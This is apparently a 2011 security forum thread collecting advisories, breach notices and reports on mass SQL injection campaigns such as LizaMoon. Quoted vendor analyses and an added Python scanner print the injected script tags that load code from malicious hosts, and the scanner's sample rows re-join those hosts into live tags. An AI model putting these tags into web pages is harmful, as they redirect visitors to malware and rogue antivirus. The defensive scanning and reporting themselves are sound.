Old Alerts

Apple multiple vulns - updates released

FYI...

Apple Safari multiple vulns - v5.0.4 released
- http://secunia.com/advisories/43696/
Release Date: 2011-03-10
Criticality level: Highly critical
Impact: Cross Site Scripting, Spoofing, Exposure of sensitive information, System access
Where: From remote
Solution: Update to version 5.0.4.
Original Advisory: http://support.apple.com/kb/HT4566
- http://techblog.avira.com/2011/03/10/the-next-browser-update-safari/en/
"... fixes at least 62 vulnerabilities..."
- http://www.securitytracker.com/id/1025183
Mar 9 2011
___

Apple iOS multiple vulns - v4.3 released
- http://secunia.com/advisories/43698/
Release Date: 2011-03-10
Criticality level: Highly critical
Impact: Cross Site Scripting, Spoofing, Exposure of sensitive information, DoS, System access
Where: From remote
Operating System: Apple iOS for iPad 4.x, Apple iPhone OS (iOS) 4.x, Apple iPhone OS (iOS) for iPod touch 4.x
... The vulnerabilities are reported in versions prior to 4.3.
Solution: Update to version 4.3.
Original Advisory: http://support.apple.com/kb/HT4564
- http://www.securitytracker.com/id/1025182
Mar 9 2011
___

Apple TV v4.2
- http://secunia.com/advisories/43697/
Release Date: 2011-03-10
Criticality level: Highly critical
Impact: Exposure of sensitive information, DoS, System access
Where: From remote
Solution: Update to Apple TV version 4.2.
Original Advisory: http://support.apple.com/kb/HT4565

:fear::fear:
 
Google Chrome v10.0.648.133 released

FYI...

Google Chrome v10.0.648.133 released
- http://secunia.com/advisories/43748/
Release Date: 2011-03-14
Criticality level: Highly critical
Impact: System access
Where: From remote
Solution: Update to version 10.0.648.133...
Original Advisory:
http://googlechromereleases.blogspot.com/2011/03/stable-and-beta-channel-updates.html

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1290
Last revised: 03/31/2011
CVSS v2 Base Score: 10.0 (HIGH)

:fear::fear:
 
Motivation - Demonstrated ... at CanSecWest 2011

FYI...

IE:
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1346
Published: 03/11/2011
CVSS Severity: 10.0 (HIGH)
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1347
Last revised: 03/12/2011
CVSS Severity: 8.8 (HIGH)
Apple:
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1344
Published: 03/11/2011
CVSS Severity: 10.0 (HIGH)
BlackBerry:
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1290
Last revised: 03/14/2011
CVSS Severity: 10.0 (HIGH)
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1415
Last revised: 03/14/2011
CVSS Severity: 10.0 (HIGH)
___

- http://www.team-cymru.org/News/
"... PWN2OWN shows us the future..."

:fear::fear::fear:
 
Foxit software multiple vulns...

FYI...

Foxit Reader vuln - workaround
- http://secunia.com/advisories/43776/
Release Date: 2011-03-15
Criticality level: Moderately critical
Impact: System access
Where: From remote
Solution Status: Vendor Workaround
Solution: Ensure that "Safe Reading Mode" is enabled.

Foxit Phantom vuln - unpatched
- http://secunia.com/advisories/43625/
Release Date: 2011-03-15
Criticality level: Highly critical
Solution Status: Unpatched
... vulnerability is confirmed in version 2.2.4.0225. Other versions may also be affected.
Solution: Do not open PDF files from untrusted sources.

:fear::fear:
 
GoogleChrome v10.0.648.151 released

FYI...

GoogleChrome v10.0.648.151 released
- http://googlechromereleases.blogspot.com/search/label/Stable updates
March 17, 2011 - "... updated to 10.0.648.151 for Windows, Mac, Linux and Chrome Frame. This release blacklists a small number of HTTPS certificates*..."
- http://googlechromereleases.blogspot.com/2011/03/stable-and-beta-channel-updates_15.html
March 15, 2011 - "The Chrome Stable and Beta channels have been updated to 10.0.648.134 for Windows, Mac, Linux and Chrome Frame. This release contains an updated version of the Adobe Flash player..."

* http://isc.sans.edu/diary.html?storyid=10603
Last Updated: 2011-03-23 18:11:20 UTC

- http://techblog.avira.com/2011/03/17/google-faster-than-adobe/en/
March 17, 2011 - "... new Chrome version 10.0.648.134 for Windows, Mac and Linux. It only includes a new version of the Flash Player where the recently found zero day vulnerability is already fixed..."

- http://secunia.com/advisories/43757/
Last Update: 2011-03-16 ...
Solution: Update to version 10.0.648.134.
___

- http://www.us-cert.gov/current/#google_releases_chrome_10_02
March 17, 2011

:fear:
 
php.net hacked ...

FYI...

php.net security notice
- http://www.php.net/archive/2011.php#id2011-03-19-2
19-Mar-2011 - "The wiki.php.net box was compromised and the attackers were able to collect wiki account credentials. No other machines in the php.net infrastructure appear to have been affected. Our biggest concern is, of course, the integrity of our source code. We did an extensive code audit and looked at every commit since 5.3.5 to make sure that no stolen accounts were used to inject anything malicious. Nothing was found. The compromised machine has been wiped and we are forcing a password change for all svn accounts. We are still investigating the details of the attack which combined a vulnerability in the Wiki software with a Linux root exploit."

- http://www.h-online.com/security/news/item/PHP-developer-wiki-server-hacked-1211874.html
21 March 2011
___

PHP 5.3.6 Released
17-Mar-2011 - "The PHP development team would like to announce the immediate availability of PHP 5.3.6. This release focuses on improving the stability of the PHP 5.3.x branch with over 60 bug fixes, some of which are security related..."

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1153
Last revised: 03/22/2011
CVSS v2 Base Score: 7.5 (HIGH) / "... in PHP 5.3.5 and earlier..."
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1092
Last revised: 03/22/2011
CVSS v2 Base Score: 7.5 (HIGH) / "... before 5.3.6..."

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1148
Last revised: 03/21/2011
CVSS v2 Base Score: 7.5 (HIGH) / "... in PHP 5.3.6 and earlier..."
> http://xforce.iss.net/xforce/xfdb/66080
"High Risk... No remedy available as of March 22, 2011..."

:fear::mad::fear:
 
Apple critical update released ...

- http://secunia.com/advisories/43814/
Release Date: 2011-03-22
Criticality level: Highly critical
Impact: Security Bypass, Cross Site Scripting, Spoofing, Exposure of system information, Exposure of sensitive information, Privilege escalation, DoS, System access
Where: From remote
Solution: Update to version 10.6.7 or apply Security Update 2011-001.
Original Advisory: Apple:
http://support.apple.com/kb/HT4581
iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=898
"... used by Apple's mobile devices, including the iPod Touch, iPhone, and iPad... could allow an attacker to execute arbitrary code with the privileges of the current user..."
___

- http://www.us-cert.gov/current/#apple_releases_security_updates4
March 22, 2011

:fear::fear:
 
Google Chrome v10.0.648.204 released

FYI...

Google Chrome v10.0.648.204 released
- http://secunia.com/advisories/43859/
Release Date: 2011-03-25
Criticality level: Highly critical
Impact: System access
Where: From remote
CVE Reference(s): CVE-2011-1291, CVE-2011-1292, CVE-2011-1293, CVE-2011-1294, CVE-2011-1295, CVE-2011-1296 ...
Solution: Update to version 10.0.648.204.
Original Advisory:
http://googlechromereleases.blogspot.com/2011/03/stable-channel-update.html
___

When clicking on the tool symbol and choosing the 'About Google Chrome' menu entry, the version check should show that Chrome is already on the current release – or offer to download and install the update.

:fear::fear:
 
MySQL and Sun hacked ...

FYI...

MySQL and Sun hacked...
- http://nakedsecurity.sophos.com/2011/03/27/mysql-com-and-sun-hacked-through-sql-injection/
March 27, 2011 - "Proving that no website is ever truly secure, it is being reported that MySQL.com has succumbed to an SQL injection attack. It was first disclosed to the Full Disclosure mailing list*... Several accounts had passwords like "qa". The irony is that they weren't compromised by means of their ridiculously simple passwords, but rather flaws in the implementation of their site... MySQL's parent company Sun/Oracle has also been attacked**. Both tables and emails were dumped from their databases, but no passwords. It does not appear to be a vulnerability in the MySQL software, but rather flaws in the implementation of their websites... It was noted on Twitter that mysql .com is also subject to an XSS (cross-site scripting) vulnerability that was reported in January 2011 and has not been remedied."
* http://seclists.org/fulldisclosure/2011/Mar/309?utm_source=twitterfeed&utm_medium=twitter

** http://tinkode27.baywords.com/sun-com-sun-mycrosystems-vulnerable-sql-injection/

- http://blog.sucuri.net/2011/03/mysql-com-compromised.html
March 27, 2011 - "... If you have an account on MySQL.com, we recommend changing your passwords ASAP..."

- https://www.computerworld.com/s/article/9215249/MySQL_Web_site_falls_victim_to_SQL_injection_attack
March 28, 2011

:fear::mad::fear:
 
28,000 URLs whacked...

FYI...

SQL mass injection hits over 28,000 URLs including iTunes
- http://community.websense.com/blogs...ss-injection-28000-urls-including-itunes.aspx
29 Mar 2011 - "Websense... has identified a new malicious mass-injection campaign that we call LizaMoon...
The LizaMoon mass-injection is a SQL injection attack...
< script src=hxxp ://lizamoon .com/ur.php></script >
According to a Google Search, over 28,000 URLs have been compromised. This includes several iTunes URLs... The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer. So good job, Apple. The URL that is injected is unavailable right now, but the server is still up and running, so that could change at any time. While it was up, the script contained simple JavaScript code that redirected the user to a well-known Rogue AV site:
hxxp ://defender-uqko .in. That site is also unavailable right now, so we don't have the actual binary analysis information available yet. The domain lizamoon .com was registered three days ago with clearly fake information... We'll keep monitoring this mass-injection attack and provide updated information as it's available."
(Screenshots and more detail available at the Websense URL above.)
___

urgent block: lizamoon .com and defender-uqko .in
- http://www.malwaredomains.com/wordpress/?p=1728
March 30th, 2011 - "Websense... is reporting a mass sql injection attack of over 28000 sites... We’ll be adding this site (and defender-uqko .in) on tonight’s update, but you shouldn’t wait... add these sites to your blocklists ASAP."

:mad::mad::mad:
 
380,000 URLs whacked...

FYI...

380,000 226,000 28000 URLs whacked...
- http://community.websense.com/blogs...ss-injection-28000-urls-including-itunes.aspx
2011-03-31 01:58
"UPDATE1: A Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen.
UPDATE2: We have been monitoring the attack since it came out and noticed that the number of the compromised URLs is still increasing, 380,000 URLs so far, moreover, more domains started to be involved except for lizamoon .com."

:fear::fear::fear:
 
LizaMoon mass-injection - updated...

FYI...

- http://blog.sucuri.net/2011/04/lizamoon-mass-sql-injection-ur-php-updates.html
April 4, 2011 - "... good way to check if your site is infected, is by using our malware scanner*. If you see IIS:4 as the malware code, you know what happened..."
* http://sitecheck.sucuri.net/scanner/
___

Update on LizaMoon mass-injection...
- http://community.websense.com/blogs.../03/31/update-on-lizamoon-mass-injection.aspx
31 Mar 2011 - "The LizaMoon mass-injection campaign is still ongoing and more than 500,000 URLs have a script link to lizamoon .com according to Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a Google Search reveals over 1,500,000 URLs that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down... All the code does is a redirect to a rogue AV site..."
(Screenshots and more detail at the Websense URL above.)

- http://isc.sans.edu/diary.html?storyid=10642
Last Updated: 2011-04-01 21:49:17 UTC - "... There doesn't seem to be anything particularly new about the infection mechanism (aside of the scope of its success) and the injection itself only inserts a random snippet of HTML to redirect victims to a rogue AV site that tells the user they are infected. One of the domains implicated in this attack was registered in October and showed up on the radar in December, so it appears the preparation of this attack has taken some time... Infected sites tend to use the same URL structure including a file "ur.php". It appears this is only affecting sites using Microsoft SQL Server 2003/2005. Defense against your sites getting infected is the standard things we ought to be doing anyway in regards to SQL injection (i.e. filter input for control characters, whitelist if possible, blacklist if not). Webserver administrators should also be checking for sudden appearance of files in their httpdocs directory..."
- http://isc.sans.edu/tag.html?tag=sql injection

- http://www.theregister.co.uk/2011/03/31/lizamoon_mass_injection_attack/
"... The count only looks at unique URLs, not infected hosts, a more meaningful metric. Even so the assault still counts as among the most widespread mass-injection attacks on record..."

- http://blog.trendmicro.com/lizamoon-etc-sql-injection-attack-still-on-going/
March 31, 2011 - "... monitoring a still-ongoing mass compromise involving a great number of websites. The compromised sites have been injected with a malicious script that triggers redirects to certain URLs that lead to malware such as FAKEAV... We saw compromised websites related to astronomy, clubs, hospitals, sports, funeral homes, electronics, and others..."

- http://ddanchev.blogspot.com/2011/03/dissecting-massive-sql-injection-attack.html
March 31, 2011 - "... the used domains are all responding to the same IPs, including the portfolios of scareware domains, which the cybercriminals naturally rotate on a periodic basis... Upon successful redirection, the campaign attempts to load the scareware domains..."
(More detail at the ddanchev.blogspot URL above.)
- http://www.virustotal.com/file-scan...e8229bfc367626961f76c03f75dcd7e95c-1301586582
File name: freesystemscan.exe
Submission date: 2011-03-31 15:49:42 (UTC)
Current status: finished
Result: 9/41 (22.0%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan...e8229bfc367626961f76c03f75dcd7e95c-1301722562
File name: a.exe
Submission date: 2011-04-02 05:36:02 (UTC)
Result: 24/42 (57.1%)
___

Lizamoon SQL Injection: 7 Months Old and Counting
- http://blog.scansafe.com/journal/2011/4/1/lizamoon-sql-injection-7-months-old-and-counting.html
April 1, 2011 - "...part of a continuous SQLi attack that spans the past seven months... 40+ malware domains... have been used in the ongoing injection attacks..."

- http://nakedsecurity.sophos.com/2011/04/01/lizamoon-sql-injection/
April 1, 2011

:fear::mad::fear:
 
SQL injection - more...

FYI...

Database Injection on Joomla Websites...
- http://blog.sucuri.net/2011/04/database-injection-on-joomla-sites-yourstatscounter-cz-cc.html
April 6, 2011 - "It seems that a good amount of Joomla sites are being infected with malware from the infamous “.cc” domains. All of the hacked sites have the malicious code injected directly in to their databases (SQL injection), via an unknown source (probably a vulnerable extension, but we are still researching the entry point). This is what is being added to the infected sites (at the top of every post in the jos_content table):
< script type="text/javascript" src="http://yourstatscounter.co.cc/statscounter307.js" >< /script >
There are many others domains being used in this attack, including:
http ://faststatscounter.co.cc/statscounter01935 .js
http ://yourstatscounter.cz.cc/statscounter301 .js
http ://yourstatscounter.co.cc/statscounter307 .js
http ://easystatscounter.co.cc/statscounter12 .js
http ://supergoogleanalytics.co.cc/
Note that those are different from the Lizamoon SQL injection of a few days ago. The Lizamoon was targeting IIS/ASP.net sites, while this one seems to be targeted only to Joomla sites.... site might be hacked(?), check it using our malware scanner*..."
* http://sitecheck.sucuri.net/

- http://google.com/safebrowsing/diagnostic?site=yourstatscounter.cz.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=faststatscounter.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=yourstatscounter.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=easystatscounter.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=supergoogleanalytics.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
___

Thousands of osCommerce sites infected...
- http://blog.sucuri.net/2011/04/continuing-attacks-against-oscommerce-khcol-com.html
April 5, 2011 - "... we are seeing thousands of osCommerce sites infected with a malware pointing to http ://khcol .com...
> Update 1: Google already blacklisted more than 1 thousand sites because of this malware. We have identified a lot more already, so this number should grow very soon...
> Update 2: Other domains being used in this attack: solomon-xl .cz.cc, thescannerantiv .com, searchableantiv .com, www1 .checker-network-hard .cz.cc and many others."

- http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=khcol.com/
"... last time suspicious content was found on this site was on 2011-04-08... Malicious software includes 2861 scripting exploit(s), 64 trojan(s), 1 exploit(s)... Over the past 90 days, khcolm .com appeared to function as an intermediary for the infection of 1149 site(s)... This site was hosted on 1 network(s) including AS17408..."
- http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:17408
"... over the past 90 days, 50 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... The last time Google tested a site on this network was on 2011-04-07, and the last time suspicious content was found was on 2011-04-07... we found 5 site(s) on this network... that appeared to function as intermediaries for the infection of 1152 other site(s)..."

- http://google.com/safebrowsing/diagnostic?site=solomon-xl.cz.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=thescannerantiv.com/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=searchableantiv.com/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=checker-network-hard.cz.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."

:mad:
 
WordPress sites hacked - link injection...

FYI...

WordPress sites hacked - link injection – Blackhat SEO SPAM
[1] - http://blog.sucuri.net/2011/04/link-injection-on-hacked-wordpress-sites-blackhat-seo-spam.html
April 11, 2011 - "For the last few months we’ve been tracking and helping webmasters affected by a very large blackhat SEO spam campaign initiated by basicpills .com and many other domains[1] located at 212.117.161.190. They infected thousands of WordPress sites and injected spam links directly in their databases (the wp-post table)... For the site owners out there, you can check if your site has been infected by scanning it with our malware and spam scanner*. It will show if these links have been added, and if you have other security issues. If your site has been hacked, we recommend changing your DB passwords immediately and checking the permissions of your wp-config.php file..."
* http://sitecheck.sucuri.net/

> http://centralops.net/co/DomainDossier.aspx
** canonical name: basicpills .com.
addresses: 212.117.161.190...
http://google.com/safebrowsing/diagnostic?site=basicpills.com/
... This site was hosted on 1 network(s) including AS5577 (ROOT).

** 212.117.161.190
country: LU
origin: AS5577
> http://www.google.com/safebrowsing/diagnostic?site=AS:5577
"Of the 1939 site(s) we tested on this network over the past 90 days, 98 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... Over the past 90 days, we found 64 site(s) on this network... that appeared to function as intermediaries for the infection of 139 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 316 site(s)... that infected 4190 other site(s)..."
___

- http://en.blog.wordpress.com/2011/04/13/security/
April 13th, 2011

:mad:
 
Apple Safari v5.0.5 released

FYI...

Apple Safari v5.0.5 released...
- http://secunia.com/advisories/44151/
Release Date: 2011-04-15
Criticality level: Highly critical ...
CVE Reference(s):
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1290
CVSS v2 Base Score: 10.0 (HIGH)
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1344
CVSS v2 Base Score: 10.0 (HIGH)
Solution: Update to version 5.0.5.
Original Advisory: Apple:
http://support.apple.com/kb/HT4596

- http://www.us-cert.gov/current/#apple_releases_safari_5_05
April 15, 2011

.
 
Chrome v10.0.648.205 released

FYI...

Google Chrome v10.0.648.205 released
- http://googlechromereleases.blogspot.com/2011/04/stable-channel-update.html
April 14, 2011 - "The Chrome Stable channel has been updated to 10.0.648.205 for Windows, Mac, Linux and Chrome Frame. This release contains a new version of Adobe Flash..."

- http://www.securitytracker.com/id/1025377
Date: Apr 15 2011
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1300
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1301
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1302
Last revised: 04/18/2011
[ALL] ... CVSS v2 Base Score: 10.0 (HIGH)

- http://www.us-cert.gov/current/#google_releases_chrome_10_04
Apr 15 2011

:fear:
 
Mass Injections leading to g01pack exploit kit

FYI...

Mass Injections Leading to g01pack Exploit Kit
- http://community.websense.com/blogs...njections-Leading-to-g01pack-Exploit-Kit.aspx
19 Apr 2011 - "... detected a new injection attack which leads to an obscure Web attack kit. The injection has three phases... The first phase of the attack is a typical vector** for exploit kits to drive traffic to their sites: script injections. Script HTML code is put on legitimate Web sites meant to drive traffic to the attack kits without the victim's knowledge. In this case, legitimate sites are injected with malicious JavaScript... In the second phase, this script injection then pulls obfuscated content from another site. The obfuscated content creates an iframe that is used to pull content from the exploit kit site... The exploit kit can basically be described as a drive-by download site used in the third and final phase of this attack. Its intent is to scan, attack, and run malicious code on the visitor's computer. If -one- of the exploit kit's Web attacks is successful, it could put malware on a victim's computer that is meant to remotely control the computer. The binary that this kit tries to run on target computers has low detection* as a Rogue AV installation. As is typical, the exploit kit's Web attack code is obfuscated... We were able to access the admin panel and confirm that this site is hosting an installation of g01pack malware tool..."
* http://www.virustotal.com/file-scan...88a65e4793c27fda8f869f6fded35756a1-1303197157
File name: JwWeagugDQKT.exe
Submission date: 2011-04-19 07:12:37 (UTC)
Result: 15/42 (35.7%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan...88a65e4793c27fda8f869f6fded35756a1-1303729645
File name: JwWeagugDQKT.exe
Submission date: 2011-04-25 11:07:25 (UTC)
Result: 30/40 (75.0%)

** http://community.websense.com/blogs...ss-injection-28000-urls-including-itunes.aspx
29 Mar 2011

:mad:
 
Mass infections – globalpoweringgathering .com

FYI...

Mass infections – globalpoweringgathering .com
- http://blog.sucuri.net/2011/04/mass-infections-globalpoweringgathering-com.html
April 25, 2011 - "We first detected malware from globalpoweringgathering .com almost a month ago, and posted on our blog* about it. But just on the last few days, we started to see a big increase in the number of sites infected with it. We were able to catalog a find almost 3 thousand sites with this malware and Google lists almost 2 thousand sites in their safe browsing page** (and it is growing each day – just yesterday it was less than 1 thousand)... On our original post, we explained about this malware, which was injecting an encoded javascript directly in the WordPress database. However, on the latest infections, we are seeing the following code added directly to the HTML or PHP files (with no obfuscation):
< script src="http ://globalpoweringgathering .com/in.php?n=15"..
With some variations, with just a number changing:
http ://globalpoweringgathering .com/in.php?n=15
http ://globalpoweringgathering .com/in.php?n=25
http ://globalpoweringgathering .com/in.php?n=2
http ://globalpoweringgathering .com/in.php?n=9
Note that this is a very similar from the “Hilary Kneber” malware distributed by these domains (hosted on the same IP addresses):
globalpoweringgathering .com
lessthenaminutehandle .com
lessthenaseconddeal .com
welcometotheglobalisnet .com ...
We are seeing multiple causes. The most common was related the usage of old versions of web applications (like WordPress, Joomla, etc). However, we are also seeing HTML-only sites hacked that got compromised via FTP due to stolen passwords. So make sure your sites are updated and change your passwords (making sure to use a strong password, that your desktop is not compromised, etc)..."
* http://blog.sucuri.net/2011/04/database-injection-lessthenaminutehandle-com-and-more-updates.html

** http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=globalpoweringgathering.com/
"... Malicious software includes 37 scripting exploit(s)... It infected 1919 domain(s)..."
___

- http://blog.sucuri.net/2011/04/jquery4html-co-cc-malware-update-fake-av-redirections.html
April 26, 2011 - "Today we started to see a lot of sites infected with an iframe malware from jquery4html .co.cc (yes, always the .co.cc)... when we tried to access this site to identify what was going on, we were greeted with a page from the .co.cc registrar saying that the domain was available:
The domain jquery4html.co.cc is available Continue to registration >>
If you want to build a site at this address, please visit us at www .co.cc
We found that very strange and tried to register the domain to see what was going on (their registration is free), but when we were close to completing the registration they said that the domain was not available anymore... Too bad.
A few hours later, that domain was already loading additional malicious iframes from diagnostic-scanner-xp-protection .com, hilitsors .cz.cc and many other intermediaries... There are many other sites being used as intermediaries (and just by looking at the domain names you can guess that they try to push the infamous Fake AV), including hundreds of .com..."
(More detail at the blog.sucuri.net URL above.)

:mad::mad:
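The injected tags quoted in the LizaMoon, Joomla ".cc" and globalpoweringgathering posts above share one detection handle: a script tag in stored content whose src points off-site and follows a recognisable path shape (ur.php, statscounterNNN.js, in.php?n=N). This added Python example (not code from Websense, Sucuri or ISC) scans CMS rows and files for such tags, flags any other off-allowlist script host as well, and separately reports entity-encoded copies like the ones iTunes left inert. The trusted host, record labels and sample rows are constructed for the demo; the three path patterns are my own reading of the quoted samples, not a vendor signature set.

```python
import html
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Matches a <script ... src=...> tag and captures the src value, quoted or bare
# (the LizaMoon tag quoted in the thread has no quotes at all).
SCRIPT_SRC_RE = re.compile(
    r"<\s*script\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)

# Entity-encoded tags (as in feeds where iTunes had encoded them, which is why
# they did not execute there) still mark a compromised record.
ENCODED_SCRIPT_RE = re.compile(r"&lt;\s*script\b.*?&gt;", re.IGNORECASE | re.DOTALL)

# Path shapes described in the thread. Assumption: these regexes are my reading
# of the quoted samples, not a complete or current indicator set.
CAMPAIGN_PATH_PATTERNS = {
    "LizaMoon-style ur.php loader": re.compile(r"/ur\.php$", re.IGNORECASE),
    "statscounterNNN.js loader (.cc domains)": re.compile(r"/statscounter\d+\.js$", re.IGNORECASE),
    "in.php?n=N loader": re.compile(r"/in\.php\?n=\d+$", re.IGNORECASE),
}


@dataclass(frozen=True)
class Finding:
    location: str   # table/row id or file path (constructed labels in the demo)
    src: str        # script src exactly as stored
    host: str       # parsed host, '' for relative URLs
    reason: str
    encoded: bool   # True when the tag was entity-encoded (inert in a browser)


def _classify(src, trusted_hosts):
    """Return (host, reason) where reason is None for an acceptable script src."""
    parts = urlsplit(src)
    host = parts.netloc.lower()
    path_q = parts.path + ("?" + parts.query if parts.query else "")
    for name, pat in CAMPAIGN_PATH_PATTERNS.items():
        if pat.search(path_q):
            return host, name
    if host and host not in trusted_hosts:
        return host, "external script host not on the site's allowlist"
    return host, None


def scan_text(location, text, trusted_hosts):
    """Return Findings for every suspicious <script src> in one stored record."""
    findings = []
    # Pass 1: literal tags, the form that actually executes in a visitor's browser.
    for m in SCRIPT_SRC_RE.finditer(text):
        host, reason = _classify(m.group(1), trusted_hosts)
        if reason:
            findings.append(Finding(location, m.group(1), host, reason, False))
    # Pass 2: entity-encoded tags, decoded only for inspection.
    for enc in ENCODED_SCRIPT_RE.finditer(text):
        for m in SCRIPT_SRC_RE.finditer(html.unescape(enc.group(0))):
            host, reason = _classify(m.group(1), trusted_hosts)
            if reason:
                findings.append(Finding(location, m.group(1), host, reason, True))
    return findings


def scan_records(records, trusted_hosts):
    """records: iterable of (location, text) pairs, e.g. rows dumped from a content table."""
    out = []
    for location, text in records:
        out.extend(scan_text(location, text, trusted_hosts))
    return out


# Constructed sample rows imitating CMS content tables plus one static file.
# The malicious hosts are the ones quoted (defanged) in the thread, re-joined so
# they parse; the trusted host is a made-up name.
TRUSTED_HOSTS = {"www.example-site.test"}
SAMPLE_RECORDS = [
    ("jos_content#101", '<script src=http://lizamoon.com/ur.php></script><p>Welcome</p>'),
    ("jos_content#102", '<p>News</p><script type="text/javascript" '
                        'src="http://yourstatscounter.co.cc/statscounter307.js"></script>'),
    ("podcast_feed#7", '&lt;script src=http://lizamoon.com/ur.php&gt;&lt;/script&gt;<p>Episode 7</p>'),
    ("wp_posts#3", '<script src="https://www.example-site.test/js/app.js"></script><p>Legit post</p>'),
    ("wp_posts#4", '<script src="//cdn.unknown-third-party.test/lib.js"></script>'),
    ("index.php", '<html><head><script src="http://globalpoweringgathering.com/in.php?n=15">'
                  '</script></head></html>'),
]

if __name__ == "__main__":
    for f in scan_records(SAMPLE_RECORDS, TRUSTED_HOSTS):
        state = "ENCODED/inert" if f.encoded else "LIVE"
        print(f"{f.location}: {state} {f.src} -> {f.reason}")
```

Run it against a dump of your own content tables (jos_content, wp_posts) and your document root; a hit on a campaign path pattern is high confidence, while an unknown external host is a lead to verify against what the site legitimately loads.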
 
Sony PSN hack ...

FYI...

PSN hack: Personal data of millions of customers stolen
- http://www.h-online.com/security/ne...-of-millions-of-customers-stolen-1233209.html
27 April 2011 - "... Sony says that 77 million customers in 59 countries, including about 32 million in Europe, use the PlayStation Network... Even if no credit card information has been stolen, effects on customers could be very unpleasant. Experts think that fraudulent activities where criminals attempt to make clever use of the harvested personal data will be particularly likely. Sony has also recommended that users change their passwords when the PSN and Qriocity come back online – however, no concrete date and time have been mentioned. Customers who use their PSN or Qriocity user name or password for other services or accounts should also change their passwords for these accounts as soon as possible."
___

- http://www.theregister.co.uk/2011/04/26/sony_playstation_network_security_breach/
26 April 2011 21:53 GMT
___

Sony PSN user info compromised...
- http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/
Apr 26, 2011 - "... We are currently working to send a similar message to the one below via email to -all- of our registered account holders regarding a compromise of personal information as a result of an illegal intrusion on our systems...

'... certain PlayStation Network and Qriocity service user account information was compromised in connection with an illegal and unauthorized intrusion into our network... we believe that an unauthorized person has obtained the following information that you provided: name, address (city, state, zip), country, email address, birthdate, PlayStation Network/Qriocity password and login, and handle/PSN online ID. It is also possible that your profile data, including purchase history and billing address (city, state, zip), and your PlayStation Network/Qriocity password security answers may have been obtained. If you have authorized a sub-account for your dependent, the same data with respect to your dependent may have been obtained. While there is no evidence at this time that credit card data was taken, we cannot rule out the possibility. If you have provided your credit card data through PlayStation Network or Qriocity, out of an abundance of caution we are advising you that your credit card number (excluding security code) and expiration date may have been obtained.
> For your security, we encourage you to be especially aware of email, telephone, and postal mail scams that ask for personal or sensitive information. Sony will not contact you in any way, including by email, asking for your credit card number, social security number or other personally identifiable information. If you are asked for this information, you can be confident Sony is not the entity asking. When the PlayStation Network and Qriocity services are fully restored, we strongly recommend that you log on and change your password. Additionally, if you use your PlayStation Network or Qriocity user name or password for other unrelated services or accounts, we strongly recommend that you change them, as well.
> To protect against possible identity theft or other financial loss, we encourage you to remain vigilant, to review your account statements and to monitor your credit reports...' ..."
(More detail at the URL above.)

- http://us.playstation.com/news/consumeralerts/#non-us
> News > Consumer Alerts

- http://blog.us.playstation.com/2011/04/26/clarifying-a-few-psn-points/
___

Sony PSN user credit card info protected by encryption
User passwords? Not so much
- http://www.theregister.co.uk/2011/04/28/sony_playstation_network_credit_cards/
28 April 2011 - "All credit card information stored on Sony's PlayStation Network was encrypted, the company said one day after warning users their user names, passwords, birth dates and home addresses were stolen in a security breach.
“The entire credit card table was encrypted and we have no evidence that credit card data was taken,” Sony representatives wrote in the update*, which was posted late on Wednesday. “The personal data table, which is a separate data set, was not encrypted, but was, of course, behind a very sophisticated security system that was breached in a malicious attack”... They said they expect some online PlayStation services to resume this Tuesday..."
* http://blog.us.playstation.com/2011/04/27/qa-1-for-playstation-network-and-qriocity-services/
___

Sony sued over PSN hack
- http://www.informationweek.com/news/security/attacks/229402362?printer_friendly=this-page
27 April 2011

:sad::fear::mad:
 